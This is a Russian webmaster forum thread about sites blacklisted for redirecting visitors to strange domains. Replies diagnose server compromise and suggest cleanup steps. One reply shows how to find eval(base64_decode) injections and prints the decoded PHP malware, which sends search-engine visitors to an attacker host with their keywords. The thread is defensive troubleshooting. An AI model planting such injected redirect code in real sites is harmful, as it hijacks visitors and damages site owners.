Не могу найти вирус на сайте. Нестандартная проблема.

Bozman
На сайте с 07.04.2007
Offline
98
786

Не так давно мои сайты на одном сервере начали попадать в блэклист firefox

Везде все просмотрел, ну ничего нету. Да и когда я заходил ничего не грузилось.

Залили старые бэкапы сайтов.

Пытался восстановить сайты, но они опять улетали в бан.

Вирус проявляется в редиректе пользователей на домены lyzwvvvh.net.in, loxzvkhvg.net.in, lqwirylnp.net.in . Действует эта зараза, только один раз на один ip, поэтому вычислить достаточно трудно.

Вот здесь похожая проблема, но решения так и не нашли http://www.google.com/support/forum/p/webmasters/thread?tid=06b58e4d4f6c5cfa&hl=ru

Если вы уже сталкивались с данной проблема, большая просьба помочь. Работы могу оплатить (только при условии, что вы действительно знаете, что делаете)

PavelWershinin
На сайте с 23.10.2010
Offline
9
#1

Пишите. Помогу не бесплатно.

ICQ: 835-Ноль-872

Skype: pavelwershinin

XR.CMS - система управления сайтами (https://xr-cms.ru)
Raistlin
На сайте с 01.02.2010
Offline
247
#2
проблема не с конкретно вашим сайтом, а со всем сервером на котором он находится. Этой же проблеме побвержены и все остальные сайты на нём. Однако, так как эта штука работает только в выборочные моменты, то засечь её крайне сложно.

на сервере был подменён бинарный файл Apache.

Еще вопросы есть?

Raistlin добавил 21.12.2010 в 07:44

З.Ы, Сам бинарник не поврежден на самом деле, там панелька придохла. А вообще реформат или сумму от 150 долларов готовьте...

Какая панель?

HostAce - Асы в своем деле (http://hostace.ru)
Andreyka
На сайте с 19.02.2005
Offline
822
#3

Сталкивался - нужен реинсталл + защита сервера.

Не стоит плодить сущности без необходимости
Bozman
На сайте с 07.04.2007
Offline
98
#4

Raistlin панель ISP lite

Andreyka, а не могли бы уточнить в чем состоит защита сервера.

Жесткий блок через фаервол всех и вся ?

Или установка антивируса ?

Raistlin
На сайте с 01.02.2010
Offline
247
#5

Руткитхантер, настройка апача, почты и т.п. и т.д. Это он имеет ввиду. Т.е. в первую очередь грамотная настройка.

S
На сайте с 07.11.2008
Offline
152
#6

В домашней директории выполните

egrep -i "base64_decode" ./ -R

И в какой-то момент найдете в некоторых файлах очень длинные строки, похожие на:

eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJW...Q=="));

скорее всего такие коды найдете в конфигах и индексах.

Во всех файлах такие строки нужно убить (если сайт перестанет работать после убития какой-то строки, то вернуть эту строку).

FTP поставить только на вход с Ваших IP. Пароль на FTP сменить.

А, если Вы начинающий гуру пхп и сделаете так:

<?

$bfg = base64_decode("aWYgKHN0cmlzdHIoJF9TRVJW...Q==");

echo $bfg;

?>

То в выводе увидите код:


<?
if (stristr($_SERVER[HTTP_REFERER],"google")) {
if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&")) {
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}else {
$keyword=urldecode($kk[1]);
}
header("Location: http://xxxx.xxx.com/?q=".$keyword);
exit();
}

}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://xxxx.xxx.com/?q=".$kk[1]);
exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://xxxx.xxx.com/?q=".$kk[1]);
exit();
?>

Короче, все гениальное - просто! ;)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий